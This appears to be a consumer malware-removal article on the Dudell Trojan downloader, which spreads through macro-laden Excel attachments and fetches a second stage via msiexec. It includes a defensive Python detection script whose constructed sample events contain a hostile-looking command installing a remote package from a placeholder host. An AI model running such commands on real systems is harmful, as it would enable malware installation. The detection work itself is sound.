Do you know what Dudell is?
Dudell is a Trojan infection component that is associated with the Rancor espionage group. This group carries out targeted attacks against government organizations and other institutions in South East Asia. Most of the time, the attacks employ several Trojan components, and each component is responsible for a certain step in the attack. Thus, if you set out to remove Dudell, you have to remember that there are many more malicious components on your system, and you must terminate them all, too. The best way to achieve that is to employ a powerful antispyware tool.
Most of the malware families employed by this espionage group were documented by security researchers in 2017 and 2018. Dudell is a new custom malware family that is used to download the main payload onto the target system. It is also believed that Dudell is used alongside Derusbi, another malware family. Derusbi is associated with Chinese cyber espionage groups, so it would not be surprising if Dudell were also used by the same crooks to steal sensitive information from South East Asian government organizations.
As far as appearance is concerned, Dudell looks like a Microsoft Excel document. Therefore, if the potential targets often have to deal with such documents, they might not consider it suspicious when it lands in their inboxes. Yes, that’s right – this infection spreads through phishing attacks. It also means that the victims open those emails and launch these dangerous files themselves.
Now let us remind you that Dudell and the attack groups that use it mostly target government organizations. This means that government employees have to be educated about potential cybersecurity threats and how to avoid them. It is also important to employ legitimate security programs that help your organization protect its systems and data from malicious attacks. Hence, all received files should be scanned before anyone opens them. If this simple step were followed, Dudell and similar infections would not be able to enter target systems so easily.
But what happens when users download and open the Dudell file? As mentioned, the file is an MS Excel document, and one of the file names it uses is “Equipment Purchase List 2018-2020 (Final).xls.” The name doesn’t look suspicious at all, and it contains no spelling errors, which are quite common in spam emails and their attachments.
The document comes with a malicious macro. Not all computers have macros enabled, so when users try to open the Dudell document, they see a prompt that urges them to enable macros. Once they click “Enable Content,” the malicious macro runs on the victim’s machine. The script that gets launched eventually downloads a second-stage payload through the Microsoft tool msiexec. From there, several other malware components take over.
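The chain described above (Excel macro launching msiexec to fetch a second stage) is exactly the kind of parent/child process relationship a defender can alert on. The following is an added example, not code from the original article or from any security vendor: it runs simple detection rules over constructed process-creation records whose fields are modelled on Sysmon Event ID 1 (parent image, image, command line); it also generalizes slightly to other Office applications and script hosts.

```python
import re

# Constructed sample process-creation events (NOT real telemetry from a Dudell case).
# Field names are an assumption modelled on Sysmon Event ID 1; adapt to your log source.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /q /i http://update.example-placeholder.invalid/pkg.msi"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\Downloads\7zip.msi"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /V"},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path (accepts either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the list of rule names this event trips (empty list if benign)."""
    reasons = []
    parent = basename(event["parent"])
    child = basename(event["image"])
    office_parent = parent in OFFICE_APPS
    # The Dudell chain: an Office document's macro spawning the Windows Installer.
    if office_parent and child == "msiexec.exe":
        reasons.append("office-spawned-msiexec")
    # msiexec asked to install a package straight from a URL (remote second stage).
    if child == "msiexec.exe" and URL_RE.search(event["cmdline"]):
        reasons.append("msiexec-remote-package")
    # Broader variant of the same technique: Office spawning a script/command host.
    if office_parent and child in SCRIPT_HOSTS:
        reasons.append("office-spawned-script-host")
    return reasons

def detect(events):
    """Return (index, reasons) for every event that trips at least one rule."""
    hits = []
    for i, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            hits.append((i, reasons))
    return hits
```

Legitimate software installs launched from Explorer (event 1) and the Installer service's own msiexec instances (event 3) are left alone; only the Office-parented and URL-sourced cases are flagged.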
There are several plug-ins that are used by this infection. Therefore, the overall capabilities of the infection may differ depending on the plug-in that is used, and what the criminals want it to do. For example, one of the plug-ins can easily take screenshots, execute commands, enumerate storage volumes, list folder contents, delete files, upload files, and so on. The point is that the malicious attack that employs Dudell can be extremely intrusive, and it might remain active on the affected system for a while before the victims notice that their system has been compromised. That is why regular system scans with a legitimate security program are vital.
The ironic part is that it is not hard to remove Dudell at all. You just need to delete the file you downloaded. However, let’s not forget that this file is just a spearhead of the entire infection, and unless you are an experienced computer user, it wouldn’t be possible to remove all the malware components manually. Hence, it is strongly recommended that you invest in a powerful security application that will detect and terminate all the dangerous files. Also, be sure to report potential cybersecurity problems to your IT department because it is also up to them to help you fight such intruders.
How to Remove Dudell
- Remove suspicious files from Desktop.
- Navigate to the Downloads folder.
- Delete suspicious files from the folder.
- Press Win+R and enter %TEMP%. Press OK.
- Delete recent files from the directory.
- Run a full system scan with SpyHunter.
In non-techie terms:
Dudell is just one piece of a much larger puzzle of malicious attacks against organizations in South East Asia. It is a Trojan infection, but it works as a tool that downloads another payload onto the victim’s system. Therefore, when you get down to removing this malicious file, you have to terminate all the dangerous components together. The best way to deal with this intruder is to employ a powerful antispyware tool to get rid of it.